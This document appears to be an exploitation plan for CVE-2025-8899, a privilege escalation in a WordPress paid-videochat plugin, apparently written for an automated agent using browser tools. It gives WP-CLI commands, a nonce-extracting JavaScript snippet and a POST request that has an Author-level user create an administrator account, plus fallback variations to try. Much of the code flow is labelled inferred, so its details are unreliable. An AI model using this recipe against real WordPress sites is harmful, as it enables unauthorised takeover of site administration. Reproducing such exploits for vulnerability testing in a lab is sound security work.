Exploitation Research Plan: CVE-2025-8899 - Privilege Escalation

1. Vulnerability Summary

The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin (<= 7.3.20) contains an improper privilege management vulnerability in the videowhisper_register_form() function. This function renders a registration form that determines the resulting user's role based on configuration (likely shortcode attributes or post metadata) without validating whether the user creating the configuration has the authority to assign high-level roles like administrator. An authenticated attacker with Author privileges can create a page with a registration form configured to assign the administrator role and then use that form to create a new admin account.

2. Attack Vector Analysis

• Entry Point: A WordPress shortcode provided by the plugin, most likely [videowhisper_register_form].
• Vulnerable Parameter: The role attribute within the shortcode or a related configuration parameter.
• Authentication Level: Authenticated (Author or above). Authors can publish posts directly. Contributors can also attempt this, but their posts require admin approval, making the attack "less likely to be successful" as per the description.
• Preconditions: The plugin must be active. The attacker must have permissions to create and publish posts/pages.

3. Code Flow (Inferred)

1. Shortcode Registration: The plugin registers a shortcode (likely via add_shortcode('videowhisper_register_form', 'videowhisper_register_form')).
2. Rendering: When a post containing the shortcode is viewed, videowhisper_register_form() executes. It parses attributes (e.g., role="administrator").
3. Form Generation: The function renders an HTML <form> for user registration. It likely embeds the target role into a hidden input field or associates it with the post ID.
4. Submission Handling: When the form is submitted (via POST to admin-ajax.php or the page itself), a handler (likely checking $_POST['action'] == 'videowhisper_register') processes the input.
5. User Creation: The handler calls wp_insert_user() or wp_create_user(), using the role specified in the form/post configuration without verifying if that role assignment is permitted for the post author.

4. Nonce Acquisition Strategy

The registration form likely includes a WordPress nonce for security. Since we need to interact with the rendered form:

1. Create the Page: Use WP-CLI to create a page with the malicious shortcode.
2. Navigate: Use browser_navigate to visit the newly created page.
3. Extract Nonce: Use browser_eval to extract the nonce from the form fields or localized JavaScript.

Inferred JS/HTML Identifiers:

• Shortcode: [videowhisper_register_form role="administrator"] (inferred based on description).
• Nonce Field: Look for name="_wpnonce" or name="videowhisper_nonce" inside the form.
• Form Action: The form action attribute will indicate if it submits to admin-ajax.php or the current URL.

5. Exploitation Strategy

Step 1: Data Setup

Create an Author user to perform the attack.

wp user create attacker attacker@example.com --role=author --user_pass=password123

Step 2: Create Malicious Page

As the Author, create a page containing the registration shortcode with the administrator role.

wp post create --post_type=page --post_title="Register Admin" --post_status=publish --post_content='[videowhisper_register_form role="administrator"]' --user=attacker

Note: If role is not an attribute, it might be role_id="administrator" or configured via a block.

Step 3: Extract Form Details

Navigate to the page and find the registration form parameters.

1. browser_navigate to the URL of the created page.
2. browser_eval to find the form and its fields:

   () => {
       const form = document.querySelector('form');
       const inputs = Array.from(form.querySelectorAll('input')).map(i => ({name: i.name, value: i.value}));
       return { action: form.action, inputs };
   }
   

Step 4: Submit Registration

Send a POST request to the identified endpoint (usually the page URL or admin-ajax.php) to register the new administrator.

Payload Example (Inferred):

• user_login: newadmin
• user_email: newadmin@example.com
• user_pass: StrongPassword123!
• role: administrator (If passed in POST)
• _wpnonce: [EXTRACTED_NONCE]
• action: videowhisper_register (If using AJAX)

Request:

POST /wp-admin/admin-ajax.php (or page URL)
Content-Type: application/x-www-form-urlencoded

action=videowhisper_register&user_login=eviladmin&user_email=evil@example.com&user_pass=Password123!&role=administrator&_wpnonce=a1b2c3d4e5

6. Test Data Setup

1. Plugin Installation: Ensure ppv-live-webcams version <= 7.3.20 is installed.
2. Attacker User: Author user created via WP-CLI.
3. Target Role: The string "administrator".

7. Expected Results

• The registration form should render on the page created by the Author.
• The POST request should return a success message (e.g., "Registration successful").
• A new user eviladmin should be created in the WordPress database.
• The user eviladmin should have the administrator role.

8. Verification Steps

After the exploit, use WP-CLI to verify the privilege escalation:

# Check if the user exists and what their role is
wp user list --role=administrator
wp user get eviladmin --field=roles

9. Alternative Approaches

• Attribute Variations: If role="administrator" doesn't work, try variations like user_role, level, or group.
• Block Editor: If the plugin uses Gutenberg blocks, the attributes are stored in JSON comments within post_content. Inspect the post_content of an existing registration page created by a real admin to see the format.
• POST directly to Page: If the shortcode handles its own POST logic, the request should go to the page URL where the shortcode is placed, not admin-ajax.php.
• Identify correct shortcode: If [videowhisper_register_form] is incorrect, use grep -r "add_shortcode" wp-content/plugins/ppv-live-webcams to find the exact registration shortcode name.